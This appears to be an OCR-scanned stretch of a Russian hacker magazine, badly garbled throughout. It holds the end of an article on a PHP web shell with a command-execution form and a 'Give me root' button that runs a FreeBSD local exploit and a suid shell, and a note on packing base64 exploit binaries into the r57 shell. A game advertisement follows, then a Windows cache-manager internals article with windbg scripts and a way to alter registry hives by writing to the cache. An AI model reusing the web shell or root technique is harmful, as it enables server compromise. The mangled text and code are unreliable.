' <Ьос1у> ' ; 

/*********** МАШ СОБЕ ***************/ 

/* 

Выводим форму для выполнения команд 
*/ 

іі ( ! іззеБ ( $_РОЗТ [ ' сгпсі 1 ] ) ) 

{ 

ргіпБ ’сЕогт теБіюсІ= "розБ " > ' . 

'<іприС пате="стс1" Буре="БехЦ" ѵа1ие=" Із 
-Ііа" > ' . 

’сіприБ Суре= " зиЬтіД " ѵа1ие= "Со" > ' . 

' </ іогт><ЬгхЬг> ' ; 

} 

еізе 

{ 

]гаск_зузЦет ( $_Р08Т [ ' стсі ' ] , $разз_зиісО ; 

} 

/* 

Выводим заветную кнопочку для получения 
рута 
*/ 

іі ( ! іззеС ( $_Р08Т [ ' діѵе_те_гооБ ' ] ) ) 

{ 

ргіпБ ' сЕогт теДЪ.осІ= "розС "> 

<іприС Суре= " зиЬтіД " пате= " діѵе_те_гооБ " 
ѵа1ие="Сіѵе те гООВ"> 

</іогт> ' ; 

} 

еізе 

{ 

діѵе_те_гооБ ( ) ; 

} 

/********** ебб СОБЕ *************/ 
ргіпБ 
' </Ьосіу> ' . 

' </Ъ.Бт1> ' ; 

?> 

ИНТЕГРАЦИЯ. АДАПТАЦИЯ 
И ПРОЧИЕ НЕПОНЯТНЫЕ СЛОВА В итоге мы таки 

получили рута! При последующем посещении ѵѵеЬ-шелла 
мы уже будем рутом (при условии, что наш суид-шелл не 
увидит рут, и не удалит его]. 



Однако шелл у нас получился довольно примитив- 
ный; чтобы интегрировать наши прелести в при- 
вычные шелла типа г57, с99, ѴѴ502 и т.д., принцип 
работы тот же. 

На диске ты найдешь подправленный мной код шелла 
г57. Единственное, что отличает подправленный 
г57 оттого, который мы сегодня написали, — в г57 
эксплойт и суид-шелл я скомпилировал, перевел 
полученные бинарники в Ьазе64 и вставил получен- 
ный код в сам шелл. Далее мы расшифровываем 
Ьазе64-код и сохраняем в файл. Таким образом, у нас 
получается один файл, — это удобнее в плане транс- 
портировки и заливки. 

С интеграцией в другие шеллы разобрались, осталось 
разобрать ситуацию с применением эксплойтов для 
других операционных систем и других версий. Причина, 
по которой я выбрал для теста РгееВЗО — этот эксплойт 
под версию 7.1 и 7.2 результатом своей работы возвра- 
щает не /Ьіп/зб, которой мы бы пользовались при про- 
стом бекконекте, а возвращает иіб и діб 0 для текущего 
процесса. То есть является универсальным. Последний 
способ для нас удачен, ведь мы можем использовать его 
непосредственно из ѵѵеЬ'а. Так мы пришли к выводу, что 
для использования эксплойта с нашими условиями необ- 
ходимо переписать эксплойты, чтобы они устанавливали 
иіб, ді<± Как это организовать — история уже для другой 
статьи. 

ИТОГИ НАШИХ ПРИКЛЮЧЕНИЙ 

Сразу хочется отметить плюсы и минусы этого подхода к 
получению рута. 

ПЛЮСЫ 

ПОЛУЧАЕМ ПРАВА РООТ НА ВЕБ-ШЕААЕ 
НЕ НУЖЕН СЕРВЕР АЛЯ БЕККОНЕКТА 
ОБХОД Т'АЙРВОАА, ТАК КАК НЕТ ИСХОДЯЩИХ СОЕ- 
ДИНЕНИЙ, БИНДА ПОРТА И Т.Д. (А ЗАЧАСТУЮ ЭТО 
БОЛЬШАЯ ПРОБЛЕМА ДЛЯ СОЗДАНИЯ БЕККОНЕКТА) 

МИНУСЫ 

ПОКА ЕСТЬ МАЛОЕ КОЛИЧЕСТВО ЭКСПЛОЙТОВ, 
КОТОРЫЕ МЫ МОЖЕМ ИСПОЛЬЗОВАТЬ; ОСТАЛЬНЫЕ 
НУЖНО РЕДАКТИРОВАТЬ 

ЕСЛИ НАШ ШЕЛЛ ПОПАДЕТ К НЕДРУГАМ, ЛИБО ПРО- 
СТО К НЕЧИСТЫМ НА РУКУ, ТО ЗЛОДЕИ ПОЛУЧАТ 
УЖЕ ГОТОВЕНЬКИЙ ВООТ-ШЕАЛ БЕЗ ОСОБЫХ УСИ- 
ЛИЙ. ТАК ЧТО - ЗАЩИЩАЙТЕ СВОЙ ШЕЛЛ! ш 
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РЕКЛАМА 






ОАЕЕ 1 1 МИЛЛИОНОВ ИГРОКОВ 

ОДИН МИР 
ПРИСОЕДИНЯЙСЯ... 





ГЕРОЯ 



в игру 



Для игры не требуется супермощный** 
компьютер. После установки не нужен даже 
диск - лишь один щелчок мыши отделяет тебя 
от мира МотИ оГ ѴІЙгсгаГі. Есть вопросы? 
Специалисты русской Службы технической 
поддержки будут рады ответить на них по 



При создании героя на выбор доступны 8 рас 
и 9 классов персонажей. Изменив одежду, 
прическу и цвет кожи, ты сделаешь своего 
героя поистине уникальным. 




телефону или электронной почте. 



З.ЖИЕ 
ЖЖШ б 



.МИРЕ 

АЯСЯАРТ 




а о м 



Мир грандиозных приключений и великих подвигов ждет и 
новичков, и ветеранов. Даже если для игры у тебя есть всего 
лишь несколько минут, уникальная система заданий поможет 
провести их с пользой. 




'Количество /четных записей игры во всех стран ах "Минимальные системные требования: ѴѴіпбоѵгс ХР (3-й пакет обновлений) или ѴѴіпбсш Ѵізіа (1-й пакет обновлений), процессор ІпіеІ 
Репііит 4 1 н 3 ГГц или АМО АШІол ХР от 1500 МГц, 512 Мб оперативной памяти (1 Гб для компьютеров с ѴѴіпйоѵгё Ѵіеіа}, ОггесІХ-чговместимзя звухоеая карта, АН Рэбеоп 7200 или более 
современная видеокарта, 15 Гб свободного места на жестком диске. 4-скоростной ОѴО-привод. широкополосное подключение к Интернету, клавиатура и мышь. 
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■ ■ АРТЕМ БАРАНОВ 



ѴАСВ, КОТОРЫЕ УПРАВЛЯЮТ СЛОТАМИ КЭША (СООТВЕТСТВИЯ МОГУТ БЫТЬ ПРОИЗВОЛ ЬНЫМИ, ТО ЕСТЬ 
НЕОБЯЗАТЕЛЬНО, ЧТО ѴАСВЫ -> СЛОТ N1 



СИСТЕМНЫЙ МАССИВ ѴАСВ-СеѴасЬз 


► 


СИСТЕМНЫЙ КЭШ МтЗузіетСасНеЗіагі 


ѴАСВ 0 


ПРЕДСТАВЛЕНИЕ 0 


ѴАСВ 1 


> 


ПРЕДСТАВЛЕНИЕ 1 


ѴАСВ 2 


■> 


ПРЕДСТАВЛЕНИЕ 2 


ѴАСВ 3 


► 


ПРЕДСТАВЛЕНИЕ 3 




► 




ѴАСВ п 


ПРЕДСТАВЛЕНИЕ 5 



КЭШ ДЛЯ ХАКЕРА 

на кзишшѵѵз 

ПРИВЕТ, КОЛЛЕГА! СЕГОДНЯ МЫ ПОГОВОРИМ О ТАКОМ ВАЖНОМ 
КОМПОНЕНТЕ ѴѴІШѴѴВ КАК ДИСПЕТЧЕР КЭША. УЗНАВ ТЕОРИЮ И 
ПОПРОБОВАВ ПРАКТИКУ. ТЫ МОЖЕШЬ СВЕРНУТЬ ГОРЫ. ПОВЕРЬ МНЕ. 
НУЖНО ЛИШЬ ЗНАТЬ АЗЫ ОТЛАДКИ. А ОСТАЛЬНОЕ ОСВОИМ ВМЕСТЕ. 



ЧТО ТАКОЕ КЭШ И С ЧЕМ ЕГО ЕДЯТ? 

Кэш служит хранилищем данных для драй- 
веров файловых систем, которые работают 
в ОСи. Когда Е5 что-то пишет на диск или 
читает с него, данные вначале попадают в 
кэш, а потом уже реально записываются на 
диск. Кроме того, замечено, что драйвер піЧз 
удерживает в кэше МРТ, и результаты ее 
модификации на диске будут видны только 
после перезагрузки. Это не совсем удобно, 
если ты хочешь модифицировать данные Р5 
прямо сразу. Короче, будем с головой погру- 
жаться во внутренности оси и самого кэша, 
попутно я буду растолковывать кое-какие 
понятия, которые хакер в области ядра дол- 
жен знать, как таблицу умножения. А для 
тех, кто совсем не в теме, скажу, что доступ 
к кэшу возможен только из режима ядра, 
поэтому, если ты незнаком с «ядреной» 
отладкой, ѵѵіпбЬд и кегпеі мод, нужно непре- 
менно запастись этими знаниями. 



Итак, кэш — это регион в системном адрес- 
ном пространстве, на который диспетчер 
кэша проецирует данные файлов, для после- 
дующего быстрого доступа к ним. Если X 
— указатель в кэш, то «Мт5уз1;еппСасЬе51:аг 
и=Х<=Мт5уз1:еппСасЬеЕпсІ». Данные в этом 
регионе разбиты на слоты (кэша) — блоки 
по 256 КЬ. Все весьма подробно расписано 
у Руссиновича, поэтому остановимся на этом 
лишь вкратце и уделим больше внимания 
практической стороне вопроса, — ручному 
исследованию кэша. 

Кэш имеет две важные особенности, которые, 
суть, следствие того, что внутренняя реализа- 
ция кэша принадлежит ѴММ (ѴігТиаІ Метогу 
Мападег]. Для проецирования данных фай- 
лов на слоты используются разделы, то есть 
сервисы ѴММ. Так что, целиком и полностью 
за подкачку данных отвечает ѴММ, а кэш вхо- 
дит в системный рабочий набор. Значит, его 
страницы также могут выгружаться. Эти осо- 



бенности подчеркивают, что диспетчер кэша 
точно не знает, какие данные файлов реаль- 
но находятся в физической памяти (поэтому 
нужно быть особенно аккуратным при чтении 
памяти кэша в своем драйвере]. 

Слоты кэша описываются блоками управ- 
ления (ѴАСВ, ѴігТиаІ Асісігезз СопТгоІ Віоск], 
которые выделяются из резидентного пула. 
Блоки управления адресуются от СсѴасЬз. 
Каждый блок управляет определенным сло- 
том и определяет его состояние. Число бло- 
ков указывается в СсІЧитЬегѴасЬз. 

ЗУБРИМ СТРУКТУРЫ 
И ГОТОВИМСЯ К ОТЛАДКЕ 

ѴАСВ описывается структурой: 

ГурсйсР зСгисі _ѴАСВ { 

РѴОІБ ВазеАсНгезз ; // рСг на слот 

Р5НАВЕБ_САСНЕ_МАР ЗДагебСасДеМар ; 
//рбг на общую карту, см. 
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ГГ^ІГІЙП 



ИЩЕМ И НАХОДИМ 
ДАННЫЕ В СТРУКТУРЕ 



далее 

ипіоп { 

ЪАКСЕ_ШТЕСЕК ЕіІеОіізеІ; //смещение в файле 
ИЗНОЕТ АсІіѵеСоипІ; 

//счетчик ссылок на представление 
} Оѵегіау; 

ЫЗТ_ЕЫТКУ ЬгиЬізІ; 

/ /ѴАСВ объединяются в список через это поле 

} ѴАСВ; 

Существует два списка ѴАСВ: 

СсѴасЬРгееІ_І5І:. Список свободных ѴАСВ, то есть готовых к 
использованию. Их ВазеАббгезз обнулен, и они не нуждаются в 
де-проецировании. 

СсѴасЫги. Список всех остальных ѴАСВ. ѴАСВ считается свободным, 
если его АсбѵеСоипІ: равен 0. При повторном использовании выпол- 
няется де-проецирование адреса слота. 

Следующая команда ѵѵіпсІЬд подтверждает названные факты. 
Незнакомым с синтаксисом команд ѵѵіпсІЬд не нужно падать в обмо- 
рок, — достаточно вбить команду в ѵѵіпсІЬд. Перед этим неплохо под- 
грузить символы (с помощью команды .геіоасі /в]. 

Вывод всех элементов ѴАСВ в списке СсѴасЫги: 

г еах=0; !1із1 "-б пісііі !_Ы8Т_ЕМТКУ . Рііпк -х \"г еах=@ 
еах+1;? @еах;? @$ех1геб-10; <31 п!!_ѴАСВ @$ех!ге1-10\ " 
пі ІСсѴасЬЬги" 

Еѵаіиаіе ехргеззіоп: 330 = 0000014а -> порядковый номер 
Еѵаіиаіе ехргеззіоп: -2120961816 = 8194Ь0е8 -> адрес 
этого ѴАСВ 

+0x000 ВазеАббгезз : ОхсбОООООО -> адрес слота в кэше 
+0x004 ЗбагебСасбеМар : 0х817161а0 _ЗНАКЕБ_САСНЕ_МАР 

-> ріг на открытую карту 

+0x008 Оѵегіау : иппатеб 

+ 0x010 ЬгиЪізІ : _ЫЗТ_ЕЫТКУ [0x81949168-0x81949178] 
Еѵаіиаіе ехргеззіоп: 331 = 00000146 
Еѵаіиаіе ехргеззіоп: -2120969784 = 819491с8 
+0x000 ВазеАббгезз : 0хс2040000 

+0x004 ЗбагебСасбеМар : 0х818с7Ь08 _ЗНАКЕБ_САСНЕ_МАР 
+0x008 Оѵегіау : иппатеб 

+ 0x010 ЬгиЬізІ : _ЫЗТ_ЕЫТЕУ [ 0х8194абЗ 8-0x81946018 ] 

У большинства таких ѴАСВ инициализированы открытые карты, 
и они спроецированы на кэш. То же самое можно проделать для 
СсѴасЬРгееЫзІ;. Если сложить последние номера ѴАСВ эти двух спи- 
сков (то есть, получить количество элементов в обоих списках], то 
будет в моем примере: 

146+663 = 7 Те 
66 СсШітбегѴасбз 11 
80551670 000007іе 

Виртуальный адрес соответствующего слота ссылается на РТЕ, ука- 
зывающий на ргоЬ-РТЕ. Он, в свою очередь, связан с подразделом, 
описывающим файл (обычно он является одним разделом, связан- 
ным с открытой картой, и проецирует файл как бинарный — смотри 
МтМарѴіеѵѵІпВузІютСасЬе). 



Кэшируемый файл описывается двумя структурами — открытой 
и закрытой картой кэша (збагеб сасЬе тар, ргіѵаіе сасЬе тар). 
Закрытая карта не так интересна, она применяется для опережаю- 
щего чтения (іпІеШдепІ: абеаб-геаб]. А вот открытая очень важна! 
Открытая карта кэша — структура, которую диспетчер кэша под- 
держивает для кэширования этого дискового файла. Как и в случае 
с управляющими областями (сопітоі агеа, структура, используемая 
ѴММ для совершения операций 1/0 для раздела], которые уникальны 
для дискового файла (одна на проецирование файла как бинарного, 
вторая как исполняемого образа], открытая карта тоже уникальна и 
адресуется через 5ЕСТІ0І\І_0ВЗЕСТ_Р0ІІ\ІТЕП5, которую удерживает 
Е50 в ЕСВ соответствующего файла. То есть, диспетчер кэша знает, 
какой слот какому файлу принадлежит, через ѴАСВ, который содержит 
указатель на открытую карту. 

ІуребеГ зігисі _ЗЕСТІ(Ж_ОВйЕСТ_РОШТЕКЗ { 

ѴОІБ* БаІаЗесІіопОби есі ; 

ѴОІБ* ЗбагебСасбеМар ; //указатель в открытую карту 
ѴОІБ* ІшадеЗесІіопОб^ есі ; 

} ЗЕСТІОЫ_ОВДЕСТ_РОШТЕКЗ , *РЗЕСТІОЫ_ОВбЕСТ_РОШТЕКЗ ; 

Диспетчер кэша может найти ее для каждого открытого Рі ІеОЬіесі, так 
как последний содержит указатель на структуру 5ЕСТІ0І\І_0ВЗЕСТ_ 
Р0ІІЧТЕР5 (ЕіІеОЬ]ес1: -> 5есбопОЬ]ес1:Роіп1:ег]. Открытая карта описы- 
вается нехилой структурой. Приведу только важные поля: 

ІуребеГ зігисі _ЗНАКЕБ_САСНЕ_МАР { 

/* 0x008*/ ипіоп _ЬАЕСЕ_ШТЕСЕЕ ЕіІеЗіге; 

//размер кэшируемого файла 

/*0х018*/ ш _ЬАЕСЕ_ШТЕСЕК ЗесІіопЗіге; 

/*0х020*/ ш _ЬАЕСЕ_ШТЕСЕК ѴаІібБаІаЪепдІб; 

/*0х030*/ _ѴАСВ* ІпіІіаІѴасбз [4 ] ; 

// массив индексов ѴАСВ 

/* 0x040*/ _ѴАСВ** Ѵасбз ; 

// указывает на предыдущее поле, если 1і1е_зіге <= ІМВ 

/* 0x044*/ _ЕІВЕ_ОВбЕСТ* РіІеОЬзесІ; 

//первый связанный с открытой картой объект 

/*0х078*/ ѴОІБ* Зесііоп; 

//раздел для проецирования файла 

/*0х090*/ _САСНЕ_МАКАСЕЕ_САЬЬВАСКЗ* Саіібаскз; 

/*0х0Б8*/ _РЕІѴАТЕ_САСНЕ_МАР РгіѵаІеСасбеМар ; 

//одна закрытая карта 

} ЗНАКЕБ_САСНЕ_МАР , *РЗНАКЕО_САСНЕ_МАР ; 

Чтобы диспетчер кэша мог быстро находить, какие части данного 
файла уже спроецированы (для них имеются представления в слотах], 
открытая карта указывает на массив индексов ѴАСВ. Первый элемент 
массива указывает на первые 256 Кб файла, второй — на следующие 
256 и т.д. В случае если файл имеет размер не больше 1 МЬ, то есть 
может уместиться в четыре слота, в качестве массива индексов высту- 
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пает массив ІпібаІѴасЬз из открытой карты. 

В противном случае массив выделяется в 
резидентном пуле. В любом случае указатель 
на него запоминается в поле ѴасЬз. Все 
закрытые карты связаны в список с головой 
РгіѵаІеЫзІ: (&5ЬагесІСасЬеМар -> РгіѵаІеЫз, & 
РгіѵаІеСасЬеМар -> РгіѵаІеЕіпкз]. Кроме того, 
все открытые карты также связаны в списки, 
с помощью ВЬагесІСасЬеМарипкз. 

За инициализацию открытой карты (если 
она еще не была создана), создание раз- 
дела и создание закрытой карты для данного 
РіІеОЬіесІ: отвечает функция, которую вызы- 
вают РЗР — СсІпібаІігеСасНеМар. 
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ѴОІБ СсІпібіаІізеСасЬеМар ( 

іп РЕ I ЬЕ_ОВ ЦЕСТ РіІеОЬ^ есб , 

іп РСС_РІЬЕ_ЗІ2ЕЗ ЕіІеЗізез , 

іп ВООЬЕАЫ РіпАссезз, 

іп РСАСНЕ_МАЫАСЕЕ_САЬЕВАСКЗ СаІІЪаскз, 

іп РѴОІБ ЬагуѴ/гібеСопбехб 

) 

На нее возложены следующие обязанности. 

1. Создает и инициализирует открытую карту кэша, если она не суще- 
ствует (поле РіІеО^есІ -> 5есбопОЬіес1:Роіп1:ег ЭЬагесІСасЬеМар 
пустое). ЭЬагесІСасЬеМар РіІеОЬіесІ: инициализируется на первый 
РіІеОЬіесІ, для которого создается открытая карта. 

2. С помощью МтСгеаіеЗесбоп создает раздел, через который потом 
будут проецироваться части файла на слоты кэша. 

3. Создает массив индексов ѴАСВ с помощью СсСгеаІеѴасЬАггау. 
Последняя инициализирует поле ѴасЬз и ЗесбопЗіге. 

Если файловой системе нужно прочитать через кэш, она вызывает 
СсСоруВеаб. 

ВООЬЕАЕ СсСоруКеаб. ( 

іп РЕ I ЬЕ_ОВ ЦЕСТ ЕіІеОЬз есб , 

// файловый объект, который был инициализирован с 
помощью СсІпібіаІігеСасЬеМар 

іп РЬАКСЕ_ШТЕСЕК ЕіІеОббзеб, //смещение читае- 
мых в файле данных 

іп ІЛЗСЖС Ьепдббц // длина читаемых данных 

іп ВООЬЕАЬ Маіб, // если бгие, тогда вызываю- 
щий может ожидать подкачку, в противном случае данные 
уже должны быть в кэше, при их отсутствии возвращает- 
ся баізе 

оиб_Ъсошіб (ЬепдбЬ) РѴОІБ Виббег, // буфер для 

копирования 

оиб РІО_ЗТАТиЗ_ВЬОСК ІоЗбабиз 

) 

Внутренне диспетчер кэша проецирует части файла с помощью 
СсбеЛ/ігІиаІАсІсІгезз, которая возвращает стартовый адрес проекции. 
Функция обслуживает (проецирует) один ѴАСВ и, соответственно, 
один слот. 

К ПРАКТИКЕ 

Ладно, хватит грузиться теорией, перейдем к практике. Следующая 
программа ѵѵіпбЬд исследует кэш: 

.ехрг /з шазш; 

.бог(г еах=0; @еах < роі (СсШтЪегѴасЪз ) ; г еах=@ 
еах+1 ) 

{ 

г есх=роі (СсѴасЬз) + @еах * 0x18; 
г еЬх=роі(@есх + 4); 

.ргіпбб "ѴасЬ #%б 0х%р -> 0х%р\п" , @еах, @есх, 



роі (@есх) ; 

. іб { @еЪх ! = 0 ) 

{ 

г еЬх = роі ( @еЪх + 0x44 ) ; 

. іб ( @еЪх ! = 0 ) 

{ 

г еЬх = @еЬх + 0x3 0; 

. іб( роі (@еЪх+0х4) ! = 0 ) 

{ 

.ргіпбб "\бЕі1е: Ох%р\п\бОббзеб : 0х%р\П%т5и\п\п" , @ 

еЬх-ОхЗО, роі (@есх+8) &66660000 , @еЪх 
} .еізе { 

}} .еізе { 

}} .еізе { 

}} 

Выборочный вывод команды имеет вид: 

ѴасЬ #282 0х8194аа70 -> 0хб90с0000 

Еііе : 0х818еб338 
Оббзеб: ОхООасОООО 

\$Мбб 

Соответственно, вначале указывается адрес структуры ѴАСВ, потом 
адрес слота в кэше, ниже — адрес файлового объекта из открытой 
карты и смещение, которое попадает в этот слот. Получается, что по 
адресу 0хб90с0000 скэширован файл $МЛ со смещения ОхООасОООО. 
Для тех крутых парней, кто интересуется, как на низком уровне дис- 
петчер памяти управляет страницами кэша, исследуем РТЕ. Для 
исследований лучше вывести процессор из режима РАЕ, создав 
новую строчку в ЬооЕіпі и вставив параметр /ІЧОРАЕ, убрав заодно 
параметры, включающие РЕР. 

Слоты кэша представляют собой проекции файла, то есть спроеци- 
рованные разделы, поэтому если РТЕ-страница активного слота не 
валидна, она будет указывать на прототипный РТЕ (ргоіо РТЕ). 

!рбе 0хб90с0000 
ѴА 690с0000 

РБЕ аб С0300Б90 РТЕ аб С0364300 

сопбаіпз 01Б55963 сопбаіпз 0123ЕС80 

рбп 1655 -С-БА--КМЕѴ поб ѵаііб 

Ргобо : ЕРЕРРРРРЕІ4 8ЕВ00 

Этот ріе ссылается на прототипный по адресу Е148ЕВ00. Вычислим 
адрес ргоІо-РТЕ руками (по известной формуле, РгоІоІуреРіеАббгезз = 
МтРадесІРооІЗіагІ: + Ргобоіуреіпсіех << 2). 

0х123ЕС80 = 10010001111101 100 1000000 0 

I 

это прототипный <- I 

Іпбех= 100100011111011000000=123 ЕС 0 « 2=48ЕВ00; 
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МтРадейРооІЗЕагЕ = еІОООООО; 

48ЕВ00+ еІОООООО = е148ЕВ00. 

Нашли адрес ргоІю-РТЕ, сдампим его, то есть получим содержимое. 

йй е148РВ00 11 
е148ЕЬ00 87944сй6 

РгоЕо-РТЕ равен 

0х87944сс1б = 1 00001111001010001001 1 00110 1011 0 
I ->РТЕ указывает на подраздел 
I ->Описывает маппируемый файл 

Вычислим адрес подраздела (по форм. ЗиЬзесбопАсІсІгеББ = 
МтЗиЬзесЕопВазе + Ргоіоіуре I псіех << 3, обычно МтЗиЬзесбопВазе 
== МтІ\ІопРадесІРоо15і:агі ). 

Іпсіех = 000011110010100010011011 = Р289В « 3 = 7944Б8; 
МтМопРадейРооІЗЕагЕ = 81181000; 7944Б8 + 81181000 = 
819154Б8 — адрес подраздела. 

ЙЕ _зиЬзесЕіоп 819154Б8 
пЕ !_ЗБВЗЕСТІ(Ж 

+0x000 СопЕгоІАгеа : 0х819154а8 _СОЫТКОЬ_АКЕА 

+ 0x004 и : иппашей 

+0x008 ЗЕагЕіпдЗесЕог : 0 

+ 0х00с ЫитЬегОЕЕиІІЗесЕогз : 0x1000 

+0x010 ЗиЬзесЕіопВазе : 0хе148й000 _ММРТЕ 

+0x014 ШизейРЕез : 0 

+0x018 РЕезІпЗиЬзесЕіоп : 0x1000 

+0х01с ЫехЕЗиЬзесЕіоп : 0x81913660 _ЗБВЗЕСТІ(Ж 

! са 0х819154а8 
СопЕгоІАгеа (3 819154а8 

ЗедшепЕ • е13(166с8 • Еііпк • 00000000 • Вііпк 00000000 
ЗесЕіоп Кеі • 1 • РЕп Веі • 2Ъ6 • Маррей Ѵіемз • Зс 
Бзег КеЕ • 0 • МаіЕЕогБеІ • 0 • ЕІизЕ СоипЕ • ОЕіІе 
СЬдесЕ • 818ей338 • МойѴігіЕеСоипЕ • 0 • ЗузЕет Ѵіемз • Зс 

Еіадз (8088) ЫоМойіЕіейѴЕгіЕіпд Еііе ШзРигдей 

Еііе : \$МЕЕ 

Сегмент имеет вид: 

ЙЕ _ЗЕСМЕМТ е13й66с8 
пЕ ! _8ЕСМЕ]МТ 

+0x000 СопЕгоІАгеа : 0х819154а8 _СОМТКОЬ_АКЕА 

+0x004 ТоЕаІМитЪегОЕРЕез : ОхІЪОО 
+0x008 ЫопЕхЕепйейРЕез : 0x1000 
+ 0х00с Ѵ\)гіСаЫеІІзегЕе1егепсез : 0 
+0x010 ЗігеОЕЗедтепЕ : ОхІЬООООО 
+0x018 ЗедтепЕРЕеТетрІаЕе : _ММРТЕ 
+0х01с МитЬегОЕСоттіЕЕейРадез : 0 
+0x020 ЕхЕепйІпЕо : (пиіі) 

+0x024 ЗузЕетІтадеВазе : (пиіі) 

+0x028 ВазейАййгезз : (пиіі) 

+0x02 с иі : иппатей 

+ 0x03 0 и2 : иппатей 

+0x034 РгоЕоЕуреРЕе : 0х61564й43 _ММРТЕ 
+0x038 ТЕеРЕез : [1] _ММРТЕ 

Получим такие же значения по открытой карте кэша: 

ЙЕ _ѵасЪ ЗЕагейСасЕеМар 0х8194аа70 
пЕ ! _ѴАСВ 

+0x004 ЗЕагейСасЕеМар : 0х818с7Ь08 _ЗНАКЕБ_САСНЕ_МАР 



Выборочный вывод структуры открытой карты с интересующими полями: 

ЙЕ _ЗНАКЕБ_САСНЕ_МАР 0х818с7Ь08 
пЕ ! _ЗНАЕЕБ_САСНЕ_МАР 

+0x008 ЕіІеЗіге : _ЬАЕСЕ_ІЫТЕСЕЕ 0х1ае8000 
+ 0x010 ВсЬЬізЕ : _ЫЗТ_ЕЫТЕУ [ 0х81913а60-0х81913 8Ь8 ] 
+0x018 ЗесЕіопЗіге : _ЬАКСЕ_ШТЕСЕК ОхІЬООООО 
+ 0x044 ЕіІеОЬз есЬ : 0х818ей338 _ЕІЪЕ_ОВЦЕСТ // совпада- 
ет с адресом, указанным в сопЬго1_агеа (вывод !са). 

+0x078 ЗесЕіоп : 0хе13й6698 // соответствующий раздел 
ЙЕ _ЗЕСТІОМ_ОВЙЕСТ ЗедшепЕ 0хе13й6698 
пЕ !_ЗЕСТКЖ_ОВБЕСТ 

+0x014 ЗедшепЕ : 0хе13й66с8 _ЗЕСМЕЫТ_ОВБЕСТ //сегмент 
для проецирования файла как бинарного 

РТЕ кэша начинаются с адреса, который указывается в 
МппВузІеппСасЬеРіеВазе (обычно совпадает с началом таблицы стра- 
ниц, ОхСООООООО]. 

Модификацию кэша на практике можно использовать для разных 
задач. Рассмотрим, например, запись в параметр раздела реестра 
без применения АРІ-функций, через кэш. В отличие отѵѵ2к, в которой 
диспетчер конфигурации хранил данные кустов в подкачиваемом 
пуле, в ѵѵхр он проецирует файлы кустов реестра, используя объекты- 
разделы. 

Попробуем модифицировать данные в разделе НКСІІ. Файл раздела 
хранится в \0оситеп1: апб 5еШпд\<ассои пі пате>\ЫТІІ5ЕВ>ВАТ. Если 
запустить приведенную выше программку ѵѵіпбЬд, ты сможешь уви- 
деть, что этих файлов смаппировано несколько, например, для встро- 
енной учетной записи системы — ЫеЕл/огкЭегѵісе: 

ѴасЬ #280 0х819Ьаа40 -> 0хй0180000 

Еііе: 0x81765610 
ОЕЕзеЕ: 0x00000000 

ХБосшпепЕз апй ЗеЕЕіпдзХгооЕХЫТБЗЕК. БАТ 

ЕооЕ — моя учетная запись 

ѴасЬ #289 0х819ЬаЫ8 -> ОхсЕбсОООО 

Еііе: 0х81666ЬЕ8 
ОЕЕзеЕ: 0x00000000 

ХБосшпепЕз апй ЗеЕЕ іпдз \ЫеЕѵтогкЗегѵісе\КГТБЗЕЕ . БАТ 

Этот ѴАСВ описывает куст для учетной записи Ые1:\л/огк5егѵісе. 
Воспользуемся первым выводом для записи гооЕ Она пока- 
зала, что адрес данных в кэше 0x60180000, при этом про- 
екция идет с начала файла, смещение ноль. Также вос- 
пользуемся командой ИчІеоЬ] для вывода более подробной 
информации. 

кй> 'ЕіІеоЬ: 0x81765610 

ХБосишепЕз апй ЗеЕЕіпдз\гооЕ\ЫТБЗЕЕ. БАТ 
Беѵісе ОЬ^есЕ: 0х81927ЬЬ8 \Бгіѵег\ЕЕйізк 
ѴрЬ : 0х8192а818 

Ассезз: Ееай ѴЕгіЕе -> присутствует тип доступа ЭДгіЕе, 
значит , страницы раздела будут сброшены в куст на диске 
Еіадз: 0x140040 

СасЕе ЗиррогЕей 
Напйіе СгеаЕей 
Еапйош Ассезз 

ЕзСопЕехЕ : 0хе1632й90 ЕзСопЕехЕ2 : 0хеЗеЕйс18 

РгіѵаЕе СасЕе Мар: 0х816750е0 
СиггепЕВуЕеОЕЕзеЕ : 0 
СасЕе БаЕа: 

ЗесЕіоп ОЬ^есЕ РоіпЕегз : 81812Й84 -> принадлежит ЕЗБ 

ЗЕагей СасЕе Мар: 81675008 
Еііе ОЕЕзеЕ: 0 іп ѴАСВ пишЬег 0 
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УСПЕХ! 



ѴасЬ: 819Ьаа40 -> наш ѴАСВ 

Уоиг ЬаЬа із ак : СІ0180000 -> и адрес данных в кэше 

Структура куста — это тема для отдельного доклада, поэтому 
быстренько пробегаемся по памяти и ищем какие-нибудь данные. 
Нашли для параметра по умолчанию раздела НКЕѴ_СиВВЕІ\ІТ_и5ЕВ\ 
АррЕѵепІзѴЕѵепіЕаЬеІзѴОеІаиІІ: его значение — ОеІаиН Веер. 

Изменим его, например, так: 

еЬ сЮ18142е 70/еЬ (10181430 70. 

Нужно подождать, пока содержимое кэша сбросится в файл. Это 
может произойти сразу, а может через некоторое время, в любом 
случае после перезагрузки данные в файле на диске будут изме- 
нены. В этом примере изменения сразу отобразились в гедесій 
(после Е5). 

Модифицирование данных через ѵѵіпбЬд хорошая практика, но в 
боевых условиях нужно писать драйвер, который это будет делать 
более-менее автоматически. Рассмотрим один из вариантов. 

При открытии кустов для мапинга, их дескрипторы сохраняют- 
ся в системной таблице дескрипторов, доступ к которой можно 
получить, например, в контексте процесса Бузует. Мы можем 
перебрать там все дескрипторы (смотри мануалы Мз-гета на 
ѵѵазт] и найти указатели на соответствующие біе обіесіы, кото- 
рые нам нужны (сравнивая полный путь к кусту с тем, что указано 
в ЕіІеЫате файлового объекта]. Зная адрес файлового объ- 
екта, мы выходим на структуру _5 ЕСТІ О Ы_0 В Э ЕСТРО I ЫТЕ Р5, 
а затем выходим на открытую карту. То есть, ЕіІеОЬ]есІ 
ЗесбопОЬдесТРоіпТег БбагесІСасбеМар. В 5НАРЕ0_САСНЕ_МАР 
анализируем, с какого смещения проецируется файл, используя 
указатель на массив ѴАСВ — _5НАРЕ0_САСНЕ_МАР-> ѴасЬз. Если 
по требуемому смещению, например, нулевому, что будет соот- 
ветствовать _5НАРЕ0_САСНЕ_МАР -> Ѵасбз[0], будет указатель 
на ѴАСВ, то из него мы и получаем указатель на слот с данными. 
Кстати, чтобы найти количество элементов в массиве, нужно раз- 
делить значение, указанное в 5НАРЕ0_САСНЕ_МАР.ЕіІе5І2е, на 
256 Кб. Напомню, запись из драйвера на страницы кэша нужно 
осуществлять с предельной осторожностью и только если страни- 
ца присутствует в памяти. В более сложном варианте нужно ана- 
лизировать поля РТЕ и ргоТо-РТЕ. 

Завершающий ехрегіепсе по этому поводу. Я нашел біе оЬ]ес1; для 
